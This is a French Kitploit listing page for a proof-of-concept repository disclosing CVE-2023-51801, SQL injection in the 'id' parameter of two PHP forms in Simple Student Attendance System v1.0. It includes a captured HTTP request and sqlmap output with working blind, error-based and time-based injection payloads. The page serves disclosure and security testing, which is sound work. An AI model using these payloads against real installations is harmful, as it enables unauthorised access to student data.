Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-51801 — Système simple de gestion des présences des étudiants v.1.0 - Multiples vulnérabilités d'injection SQL - student_form.php et class_form.php | Kitploit
Outils/GitHubGitHub/geraldoalcantara/cve-2023-51801
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubgeraldoalcantara/cve-2023-51801

CVE-2023-51801

Système simple de gestion des présences des étudiants v.1.0 - Multiples vulnérabilités d'injection SQL - student_form.php et class_form.php

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-51801

Simple Student Attendance System v.1.0 - Multiples vulnérabilités d'injection SQL - student_form.php et class_form.php

Description: Le Simple Student Attendance System v.1.0 est sujet à de multiples vulnérabilités d'injection SQL pouvant être exploitées par des attaquants authentifiés. Ces vulnérabilités existent dans student_form.php et class_form.php, permettant l'exécution de commandes SQL arbitraires via le paramètre 'id'.

Version du produit vulnérable : Simple Student Attendance System v.1.0
Auteur CVE : Geraldo Alcântara
Date : 29/11/2023
Confirmé le : 10/01/2024
CVE : CVE-2023-51801
Lien CVE : https://www.cve.org/CVERecord?id=CVE-2023-51801
Lien NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-51801
Lien Tenable : https://www.tenable.com/cve/CVE-2023-51801
Testé sur : Windows

Étapes pour reproduire :

Pour exploiter cette vulnérabilité, un attaquant doit naviguer vers les pages 'Student' ou 'Classes', où il peut ensuite modifier ou ajouter un étudiant ou une classe. La charge utile malveillante doit ensuite être insérée dans le paramètre 'id'.

Composant affecté :

Composants : student_form.php et class_form.php
Paramètre : id

Requête :

root@kitploit:~
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'

SQLMap

root@kitploit:~
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh

Découvreur(s)/Crédits :
Geraldo Alcântara

Télécharger l’outil